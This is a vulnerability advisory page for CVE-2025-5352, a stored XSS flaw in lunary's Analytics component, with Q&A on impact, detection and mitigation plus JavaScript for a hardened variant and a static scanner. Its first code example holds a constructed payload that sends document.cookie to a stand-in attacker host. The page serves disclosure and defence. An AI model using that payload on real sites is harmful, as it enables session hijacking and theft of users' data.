CVE-2025-5352
BaseFortify
Publication date: 2025-08-23
Last updated on: 2025-11-26
Assigner: huntr.dev
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| lunary | lunary | < 1.9.25 (1.9.25 excluded) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a critical stored Cross-Site Scripting (XSS) issue in the Analytics component of lunary-ai/lunary, affecting versions up to 1.9.23 (the fix shipped in 1.9.25). The value of the environment variable NEXT_PUBLIC_CUSTOM_SCRIPT is written into the DOM through React's dangerouslySetInnerHTML without any sanitization or validation. Because Next.js inlines NEXT_PUBLIC_* variables into the client bundle at build time, an attacker who can set this variable during the build or deployment, or who has compromised the server, gets arbitrary JavaScript executed in the browser of every user who loads the page.
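The shape of the bug, shown as an added illustration rather than lunary's actual source: the first function models what the vulnerable component hands to React (the raw variable becomes HTML), the second models a hardened replacement that treats the variable as a script URL, validates it against an allowlist, and never produces raw HTML. The function names, the allowlisted host and the payload are assumptions made for this example; React's JSX is modelled as the props object it would receive so the code runs under plain Node without React installed.

```javascript
// Added example for this page, not lunary's code. Models a Next.js Analytics
// component that renders NEXT_PUBLIC_CUSTOM_SCRIPT; names and hosts are assumed.

// Vulnerable shape: whatever the env var holds becomes raw HTML in every
// user's page. Next.js inlines NEXT_PUBLIC_* at build time, so the value is
// baked into the client bundle and served to all users until a rebuild.
function vulnerableCustomScriptProps(env) {
  const html = env.NEXT_PUBLIC_CUSTOM_SCRIPT;
  if (!html) return null;
  return { dangerouslySetInnerHTML: { __html: html } };
}

// Hardened shape: the variable is a script URL, not HTML. Parse it, require
// https, require the host to be on an allowlist, and emit <script src=...>
// through ordinary React props (React escapes attribute values; no raw HTML
// reaches the DOM).
const ALLOWED_SCRIPT_HOSTS = new Set(['analytics.example.com']); // assumed allowlist

function hardenedCustomScriptProps(env) {
  const raw = env.NEXT_PUBLIC_CUSTOM_SCRIPT;
  if (!raw) return null;
  let url;
  try {
    url = new URL(raw);                    // inline HTML/JS is not a URL: refused
  } catch {
    return null;
  }
  if (url.protocol !== 'https:') return null;             // rejects http:, javascript:, data:
  if (!ALLOWED_SCRIPT_HOSTS.has(url.hostname)) return null; // also defeats user@host tricks
  return { src: url.href, async: true };
}

// Constructed payload of the kind the advisory describes (not a real sample).
const PAYLOAD = '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>';

// Side-by-side run on the same environment.
const tainted = { NEXT_PUBLIC_CUSTOM_SCRIPT: PAYLOAD };
console.log('vulnerable:', vulnerableCustomScriptProps(tainted));
console.log('hardened  :', hardenedCustomScriptProps(tainted));
console.log('allowed   :', hardenedCustomScriptProps({ NEXT_PUBLIC_CUSTOM_SCRIPT: 'https://analytics.example.com/a.js' }));
```

The allowlist is the important part: a URL parse alone still admits https://attacker.invalid/x.js, and a naive host string check admits https://analytics.example.com@attacker.invalid/x.js, which the WHATWG URL parser resolves to host attacker.invalid.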
How can this vulnerability impact me?
Arbitrary JavaScript running in every user's browser can lead to complete account takeover, data exfiltration, malware distribution and persistent attacks on all users. Because the injected value is compiled into the client bundle, the attack persists until the environment variable is cleaned and the application is rebuilt and redeployed.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection has two parts: confirm that a vulnerable lunary-ai/lunary version (up to 1.9.23) is deployed, for example from the version field of the deployed package.json or the container image tag, and check whether NEXT_PUBLIC_CUSTOM_SCRIPT is set and reaches the DOM. In the source or deployment tree, search for the variable with `grep -r NEXT_PUBLIC_CUSTOM_SCRIPT /path/to/deployment`, and check the build and runtime environment with `printenv | grep NEXT_PUBLIC_CUSTOM_SCRIPT`. Note that Next.js inlines NEXT_PUBLIC_* variables at build time, so `printenv` on the running container can be empty while the value is already baked into the bundle; in that case grep the built output (the `.next` directory for a standard build) for the script contents or for `__html`, since the variable name itself no longer appears there. Finally, inspect the served pages with browser developer tools or by capturing network traffic and look for unexpected inline script tags or script elements near the Analytics component. [1]
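A static check for the source-level sink described above, added here as example code (not lunary's code or tooling): it looks for `__html:` expressions whose value comes from process.env, either directly or through a local alias such as `const customScript = process.env.NEXT_PUBLIC_CUSTOM_SCRIPT`. It is a heuristic text scan, not a parser, so hits are leads to review rather than proof, and misses are not proof of absence. The sample sources embedded at the bottom are constructed for this example and are not lunary's files.

```javascript
// Added detection helper for this page, not part of lunary. Heuristic scan for
// process.env.<NAME> flowing into dangerouslySetInnerHTML's __html.

// Pass 1: identifiers assigned from process.env, covering both
//   const x = process.env.NAME;   and   const { NAME: x } = process.env;
function collectEnvAliases(src) {
  const aliases = new Map(); // identifier -> env var name
  const direct = /\b(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*process\.env\.([A-Z0-9_]+)/g;
  for (const m of src.matchAll(direct)) aliases.set(m[1], m[2]);
  const destructured = /\b(?:const|let|var)\s*\{([^}]*)\}\s*=\s*process\.env\b/g;
  for (const m of src.matchAll(destructured)) {
    for (const part of m[1].split(',')) {
      const [name, alias] = part.split(':').map((s) => s.trim());
      if (name) aliases.set(alias || name, name);
    }
  }
  return aliases;
}

// Pass 2: every `__html: <expr>` whose expression names process.env or an alias.
function findEnvToInnerHtml(src, file = '<inline>') {
  const aliases = collectEnvAliases(src);
  const findings = [];
  const sink = /__html\s*:\s*([^}]*)/g; // expression up to the closing brace of { __html: ... }
  for (const m of src.matchAll(sink)) {
    const expr = m[1];
    const line = src.slice(0, m.index).split('\n').length; // 1-based line of the sink
    const env = expr.match(/process\.env\.([A-Z0-9_]+)/);
    if (env) {
      findings.push({ file, line, envVar: env[1], via: 'process.env' });
      continue;
    }
    for (const [id, envVar] of aliases) {
      const ref = new RegExp('\\b' + id.replace(/\$/g, '\\$') + '\\b');
      if (ref.test(expr)) {
        findings.push({ file, line, envVar, via: id });
        break;
      }
    }
  }
  return findings;
}

// Scan sources given as { filename: contents }. To run over a checkout, build
// that object with fs.readFileSync over *.js/*.jsx/*.ts/*.tsx (skip node_modules);
// the directory walk is left out so the example runs offline on the samples.
function scanSources(sources) {
  return Object.entries(sources).flatMap(([file, src]) => findEnvToInnerHtml(src, file));
}

// Constructed samples (not lunary source). Avoids "${" so the template literals stay literal.
const SAMPLE_VULNERABLE = `import Head from 'next/head';
const customScript = process.env.NEXT_PUBLIC_CUSTOM_SCRIPT;
export default function Analytics() {
  return (
    <div>
      {customScript && <div dangerouslySetInnerHTML={{ __html: customScript }} />}
    </div>
  );
}`;
const SAMPLE_DIRECT = `export const Banner = () => (
  <div dangerouslySetInnerHTML={{ __html: process.env.NEXT_PUBLIC_CUSTOM_SCRIPT }} />
);`;
const SAMPLE_DESTRUCTURED = `const { NEXT_PUBLIC_CUSTOM_SCRIPT: injected } = process.env;
export const Tracker = () => <span dangerouslySetInnerHTML={{ __html: injected }} />;`;
const SAMPLE_SAFE = `export default function Analytics() {
  const src = process.env.NEXT_PUBLIC_CUSTOM_SCRIPT_URL;
  return <script src={src} async />;
}`;
const SAMPLE_CONSTANT = `const { NEXT_PUBLIC_APP_NAME } = process.env;
export const Footer = () => (
  <p dangerouslySetInnerHTML={{ __html: '&copy; 2025 Example Corp' }} />
);`;

const REPORT = scanSources({
  'analytics.tsx': SAMPLE_VULNERABLE,
  'banner.jsx': SAMPLE_DIRECT,
  'tracker.tsx': SAMPLE_DESTRUCTURED,
  'safe.tsx': SAMPLE_SAFE,
  'footer.tsx': SAMPLE_CONSTANT,
});
for (const f of REPORT) console.log(`${f.file}:${f.line} __html <- ${f.envVar} (via ${f.via})`);
```

Only the first three samples are reported; a variable rendered through a normal `src` prop and a constant HTML string are left alone, which is the distinction a reviewer then needs to confirm by hand for each hit.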
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation is to upgrade lunary-ai/lunary to version 1.9.25 or later, where the code that injects NEXT_PUBLIC_CUSTOM_SCRIPT has been removed. If upgrading is not immediately possible, make sure NEXT_PUBLIC_CUSTOM_SCRIPT is unset, or set only from a trusted source, in the environment where the application is built, since that is where the value is compiled into the client bundle; rebuild and redeploy after removing or sanitizing it so that an already-baked value does not keep being served. Also review the build pipeline, deployment configuration and server for any compromise that could have allowed the variable to be manipulated. [1]